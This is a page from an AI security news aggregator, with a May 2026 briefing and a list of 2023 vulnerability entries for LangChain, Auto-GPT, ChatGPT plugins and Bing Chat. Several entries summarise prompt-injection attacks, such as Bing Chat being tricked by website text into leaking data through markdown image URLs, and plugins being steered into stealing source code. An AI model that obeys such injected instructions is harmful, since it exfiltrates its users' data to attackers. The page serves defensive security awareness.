aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDatasetFor devs
Subscribe
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

[TOTAL_TRACKED]
3,710
[LAST_24H]
1
[LAST_7D]
1
Daily BriefingFriday, May 8, 2026
>

Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (running any commands an attacker wants) on the server by submitting malicious configurations or prompt templates without sandboxing (CVE-2026-42271, CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).

>

ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that allows malicious Chrome extensions to hijack it and perform unauthorized actions like exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

Latest Intel

page 317/371
VIEW ALL
01

CVE-2023-37273: Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. Running Aut

security
Jul 13, 2023

Auto-GPT versions before 0.4.3 have a security flaw where the docker-compose.yml file (a configuration file that sets up Docker containers) is mounted into the container without write protection. If an attacker tricks Auto-GPT into running malicious code through the `execute_python_file` or `execute_python_code` commands, they can overwrite this file and gain control of the host system (the main computer running Auto-GPT) when it restarts.

>

AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk compared to just 13% for traditional software, with only 38% of high-risk AI issues getting resolved. Security experts attribute this gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in input), and fragmented responsibility for remediation across teams.

>

Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely-trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromises at scale.

Fix: Update to Auto-GPT version 0.4.3 or later, as the issue has been patched in that version.

NVD/CVE Database
02

Google Docs AI Features: Vulnerabilities and Risks

securitysafety
Jul 12, 2023

Google Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information you don't know the source or reliability of) could lead to unwanted consequences, though currently attackers have limited ways to exploit these features.

Embrace The Red
03

OpenAI Removes the "Chat with Code" Plugin From Store

security
Jul 6, 2023

OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.

Embrace The Red
04

CVE-2023-36189: SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via th

security
Jul 6, 2023

A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL commands into input fields) exists in langchain versions before v0.0.247 in the SQLDatabaseChain component, allowing remote attackers to obtain sensitive information from databases.

Fix: Update langchain to version v0.0.247 or later.

NVD/CVE Database
05

CVE-2023-36188: An issue in langchain v.0.0.64 allows a remote attacker to execute arbitrary code via the PALChain parameter in the Pyth

security
Jul 6, 2023

CVE-2023-36188 is a vulnerability in langchain version 0.0.64 that allows a remote attacker to execute arbitrary code (running commands they shouldn't be able to run) through the PALChain parameter in Python's exec method. This is a type of injection attack (CWE-74, where an attacker tricks a system by inserting malicious code into input that gets processed as commands).

Fix: A patch is available at https://github.com/hwchase17/langchain/pull/6003

NVD/CVE Database
06

CVE-2023-36258: An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, ex

security
Jul 3, 2023

CVE-2023-36258 is a vulnerability in LangChain before version 0.0.236 that allows an attacker to execute arbitrary code (run any commands they want on a system) by exploiting the ability to use Python functions like os.system, exec, or eval (functions that can run code dynamically). This is a code injection vulnerability (CWE-94, where attackers trick a program into running unintended code).

Fix: Upgrade LangChain to version 0.0.236 or later.

NVD/CVE Database
07

CVE-2023-34541: Langchain 0.0.171 is vulnerable to Arbitrary code execution in load_prompt.

security
Jun 20, 2023

Langchain version 0.0.171 has a vulnerability that allows arbitrary code execution (running uncontrolled commands on a system) through its load_prompt function. The vulnerability was reported in June 2023, but the provided source material does not contain detailed information about how the vulnerability works or its severity rating.

NVD/CVE Database
08

Plugin Vulnerabilities: Visit a Website and Have Your Source Code Stolen

securitysafety
Jun 20, 2023

OpenAI's plugin store contains security vulnerabilities, particularly in plugins that can act on behalf of users without adequate security review. These plugins are susceptible to prompt injection attacks (tricking an AI by hiding instructions in its input) and the Confused Deputy Problem (where an attacker can manipulate a plugin into performing harmful actions by exploiting its trust in the AI system), allowing adversaries to steal source code or cause other damage.

Embrace The Red
09

Bing Chat: Data Exfiltration Exploit Explained

security
Jun 18, 2023

Bing Chat contained a prompt injection vulnerability (tricking an AI by hiding instructions in its input) where malicious text on websites could trick the AI into returning markdown image tags that send sensitive data to an attacker's server. When Bing Chat's client converts markdown to HTML, an attacker can embed data in the image URL, exfiltrating (stealing and sending out) information without the user knowing.

Embrace The Red
10

CVE-2023-34540: Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the component JiraAPI

security
Jun 14, 2023

Langchain versions before v0.0.225 contained a remote code execution (RCE, where attackers can run commands on a system they don't own) vulnerability in the JiraAPIWrapper component that allowed attackers to execute arbitrary code through specially crafted input. The vulnerability was identified in the JiraAPI wrapper component of the library.

Fix: Update Langchain to v0.0.225 or later. A fix is available in the release v0.0.225.

NVD/CVE Database
Prev1...315316317318319...371Next